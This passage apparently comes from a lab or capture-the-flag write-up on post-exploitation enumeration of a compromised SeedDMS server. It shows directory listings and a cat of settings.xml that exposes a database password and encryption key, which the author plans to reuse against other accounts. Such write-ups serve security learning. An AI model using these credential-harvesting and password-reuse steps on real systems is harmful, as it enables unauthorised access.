Configuration File
After making some limited basic system enumeration, I decided to go through the file system, hoping to find any valuable information to escalate privileges Since I gained a foothold by exploited an SeedDMS instance, I will check the application directory.
$ ls -la /var/www/html/
total 0
drwxr-xr-x. 3 root root 24 Nov 3 2020 .
drwxr-xr-x. 4 root root 33 Nov 3 2020 ..
drwxr-xr-x. 7 nginx nginx 68 Apr 21 2020 seeddms51x
$ ls -la /var/www/html/seeddms51x
total 0
drwxr-xr-x. 7 nginx nginx 68 Apr 21 2020 .
drwxr-xr-x. 3 root root 24 Nov 3 2020 ..
drwxr-xr-x. 2 nginx nginx 93 Mar 2 2020 conf
drwxr-xr-x. 9 nginx nginx 117 Apr 21 2020 data
drwxr-xr-x. 6 nginx nginx 101 Dec 3 2019 pear
drwxr-xr-x. 14 root root 256 May 10 2021 seeddms
drwxr-xr-x. 3 nginx nginx 207 Jul 30 2019 wwwIt seems that SeedDMS is the only web application hosted at the /var/www/html directory
Additionally, I see the conf directory inside
$ ls -la /var/www/html/seeddms51x/conf
total 40
drwxr-xr-x. 2 nginx nginx 93 Mar 2 2020 .
drwxr-xr-x. 7 nginx nginx 68 Apr 21 2020 ..
-rw-r--r--. 1 nginx nginx 261 Jan 15 2020 .htaccess
-r--------. 1 nginx nginx 11933 Apr 21 2020 settings.xml
-rw-r--r--. 1 nginx nginx 13771 Mar 14 2018 settings.xml.template
-rw-r--r--. 1 nginx nginx 4247 Feb 20 2013 stopwords.txtThere is the settings.xml file
It may contains either web or DB credentials
DB Credential
$ cat /var/www/html/seeddms51x/conf/settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<site>
[...REDACTED...]
<calendar enableCalendar="true" calendarDefaultView="y" firstDayOfWeek="0">
</calendar>
<webdav enableWebdavReplaceDoc="true"/></site>
<system>
<server rootDir="/var/www/html/seeddms51x/seeddms/" httpRoot="/seeddms51x/seeddms/" contentDir="/var/www/html/seeddms51x/data/" stagingDir="/var/www/html/seeddms51x/data/staging/" luceneDir="/var/www/html/seeddms51x/data/lucene/" logFileEnable="true" logFileRotation="d" enableLargeFileUpload="false" partitionSize="2000000" cacheDir="/var/www/html/seeddms51x/data/cache/" dropFolderDir="" backupDir="" repositoryUrl="" maxUploadSize="" enableXsendfile="false">
</server>
<authentication enableGuestLogin="false" enablePasswordForgotten="false" restricted="true" enableUserImage="false" disableSelfEdit="false" passwordStrength="0" passwordStrengthAlgorithm="simple" passwordExpiration="10" passwordHistory="0" loginFailure="0" autoLoginUser="0" quota="0" undelUserIds="" encryptionKey="cfecb42d13f2e1666cddde56991a2cbf" cookieLifetime="0" enableGuestAutoLogin="false" defaultAccessDocs="0">
<connectors>
<connector enable="false" type="ldap" host="ldaps://ldap.host.com" port="389" baseDN="" bindDN="" bindPw="">
</connector>
<connector enable="false" type="AD" host="ldap.example.com" port="389" baseDN="" accountDomainName="example.com" bindDN="" bindPw="">
</connector>
</connectors>
</authentication>
<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
</database>
<smtp smtpServer="localhost" smtpPort="25" smtpSendFrom="seeddms@localhost" smtpUser="" smtpPassword=""/>
</system>
<advanced>
[...REDACTED...]
</advanced>
<extensions><extension name="example"/></extensions></configuration>While there are a lot of information regarding the application configuration, I see the DB credential; seeddms:ied^ieY6xoquu
I should test all the users for password reuse